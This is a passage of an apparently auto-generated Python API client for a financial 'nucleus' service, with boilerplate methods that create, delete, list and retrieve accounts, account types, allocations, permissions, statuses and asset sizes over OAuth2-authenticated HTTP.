(data) = self.create_account_type_using_post_with_http_info(account_type_request, **kwargs) # noqa: E501
return data
def create_account_type_using_post_with_http_info(self, account_type_request, **kwargs): # noqa: E501
"""Create an account type # noqa: E501
Create a new account type for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_type_using_post_with_http_info(account_type_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountType account_type_request: accountTypeRequest (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_type_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type_request' is set
if self.api_client.client_side_validation and ('account_type_request' not in params or
params['account_type_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_request` when calling `create_account_type_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_type_request' in params:
body_params = params['account_type_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_using_post(self, account, **kwargs): # noqa: E501
"""Create an account # noqa: E501
Create an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_using_post(account, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Account account: account (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_using_post_with_http_info(account, **kwargs) # noqa: E501
else:
(data) = self.create_account_using_post_with_http_info(account, **kwargs) # noqa: E501
return data
def create_account_using_post_with_http_info(self, account, **kwargs): # noqa: E501
"""Create an account # noqa: E501
Create an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_using_post_with_http_info(account, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Account account: account (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account' is set
if self.api_client.client_side_validation and ('account' not in params or
params['account'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account` when calling `create_account_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account' in params:
body_params = params['account']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_allocation_mapping_using_delete(self, account_allocation_id, **kwargs): # noqa: E501
"""Delete an account allocation # noqa: E501
Permanently delete an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_allocation_mapping_using_delete(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_allocation_mapping_using_delete_with_http_info(account_allocation_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_allocation_mapping_using_delete_with_http_info(account_allocation_id, **kwargs) # noqa: E501
return data
def delete_account_allocation_mapping_using_delete_with_http_info(self, account_allocation_id, **kwargs): # noqa: E501
"""Delete an account allocation # noqa: E501
Permanently delete an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_allocation_mapping_using_delete_with_http_info(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_allocation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_allocation_mapping_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_allocation_id' is set
if self.api_client.client_side_validation and ('account_allocation_id' not in params or
params['account_allocation_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_id` when calling `delete_account_allocation_mapping_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_allocation_id' in params:
path_params['account_allocation_id'] = params['account_allocation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation/{account_allocation_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_permission_using_delete(self, account_id, **kwargs): # noqa: E501
"""Delete an account permission # noqa: E501
Delete an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_permission_using_delete(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_permission_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_permission_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
return data
def delete_account_permission_using_delete_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Delete an account permission # noqa: E501
Delete an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_permission_using_delete_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_permission_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_permission_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission/{account_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_status_using_delete(self, account_status_id, **kwargs): # noqa: E501
"""Delete an account status # noqa: E501
Permanently delete an account status record from an account’s history. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_status_using_delete(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_status_using_delete_with_http_info(account_status_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_status_using_delete_with_http_info(account_status_id, **kwargs) # noqa: E501
return data
def delete_account_status_using_delete_with_http_info(self, account_status_id, **kwargs): # noqa: E501
"""Delete an account status # noqa: E501
Permanently delete an account status record from an account’s history. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_status_using_delete_with_http_info(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_status_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status_id' is set
if self.api_client.client_side_validation and ('account_status_id' not in params or
params['account_status_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_id` when calling `delete_account_status_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_status_id' in params:
path_params['account_status_id'] = params['account_status_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status/{account_status_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_type_using_delete(self, account_type_id, **kwargs): # noqa: E501
"""Delete an account type # noqa: E501
Permanently delete a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_type_using_delete(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_type_using_delete_with_http_info(account_type_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_type_using_delete_with_http_info(account_type_id, **kwargs) # noqa: E501
return data
def delete_account_type_using_delete_with_http_info(self, account_type_id, **kwargs): # noqa: E501
"""Delete an account type # noqa: E501
Permanently delete a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_type_using_delete_with_http_info(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_type_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type_id' is set
if self.api_client.client_side_validation and ('account_type_id' not in params or
params['account_type_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_id` when calling `delete_account_type_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_type_id' in params:
path_params['account_type_id'] = params['account_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type/{account_type_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_using_delete(self, account_id, **kwargs): # noqa: E501
"""Delete an account # noqa: E501
Permanently delete an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_using_delete(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
return data
def delete_account_using_delete_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Delete an account # noqa: E501
Permanently delete an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_using_delete_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_all_using_get(self, **kwargs): # noqa: E501
"""List all accounts # noqa: E501
Get information for all accounts for all clients defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccount
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
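# Usage sketch (editor's note, hypothetical values): the listing endpoint accepts the optional
# paging/sorting keywords documented above (ascending, filter, order_by, page, size).
#   page_of_accounts = api.get_account_all_using_get(page=0, size=25, ascending=True)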
def get_account_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all accounts # noqa: E501
Get information for all accounts for all clients defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccount
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccount', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_allocation_mapping_all_using_get(self, **kwargs): # noqa: E501
"""List all account allocations # noqa: E501
Get information for all account-allocation mappings for all accounts defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_allocation_mapping_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_allocation_mapping_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_account_allocation_mapping_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account allocations # noqa: E501
Get information for all account-allocation mappings for all accounts defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_allocation_mapping_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_allocation_mapping_using_get(self, account_allocation_id, **kwargs): # noqa: E501
"""Retrieve an account allocation # noqa: E501
Retrieve the information for a specific account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_using_get(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_allocation_mapping_using_get_with_http_info(account_allocation_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_allocation_mapping_using_get_with_http_info(account_allocation_id, **kwargs) # noqa: E501
return data
def get_account_allocation_mapping_using_get_with_http_info(self, account_allocation_id, **kwargs): # noqa: E501
"""Retrieve an account allocation # noqa: E501
Retrieve the information for a specific account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_using_get_with_http_info(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_allocation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_allocation_mapping_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_allocation_id' is set
if self.api_client.client_side_validation and ('account_allocation_id' not in params or
params['account_allocation_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_id` when calling `get_account_allocation_mapping_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_allocation_id' in params:
path_params['account_allocation_id'] = params['account_allocation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation/{account_allocation_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_asset_size_agg_all_using_get(self, account_id, **kwargs): # noqa: E501
"""List all account asset sizes # noqa: E501
Get a list of asset sizes by date for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_asset_size_agg_all_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M), Annually (Y), or Daily (D); pass the one-letter code, which is case-sensitive
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_asset_size_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_asset_size_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_asset_size_agg_all_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all account asset sizes # noqa: E501
Get a list of asset sizes by date for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_asset_size_agg_all_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M), Annually (Y), or Daily (D); pass the one-letter code, which is case-sensitive
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'currency_conversion', 'end_date', 'exclude_subledger', 'get_latest', 'sort_type', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_asset_size_agg_all_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_asset_size_agg_all_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'exclude_subledger' in params:
query_params.append(('exclude_subledger', params['exclude_subledger'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'sort_type' in params:
query_params.append(('sort_type', params['sort_type'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/asset_size', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[AvailableDateDoubleVO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
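# Usage sketch (not executed): listing asset sizes for an account over a
# date range, aggregated monthly. `api` is assumed to be an instance of the
# surrounding API class (see the earlier sketch); the UUID is a placeholder.
#
#   from datetime import date
#
#   sizes = api.get_account_asset_size_agg_all_using_get(
#       "00000000-0000-0000-0000-000000000000",
#       start_date=date(2020, 1, 1),
#       end_date=date(2020, 12, 31),
#       sort_type="M")          # one-letter code from the docstring: Q, M, Y or D
#   for point in sizes:         # list[AvailableDateDoubleVO]
#       print(point)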
def get_account_overview_using_get(self, account_id, **kwargs): # noqa: E501
"""List all Account overview # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_overview_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str order_by: order_by
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_overview_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_overview_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_overview_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all Account overview # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_overview_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str order_by: order_by
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'ascending', 'order_by'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
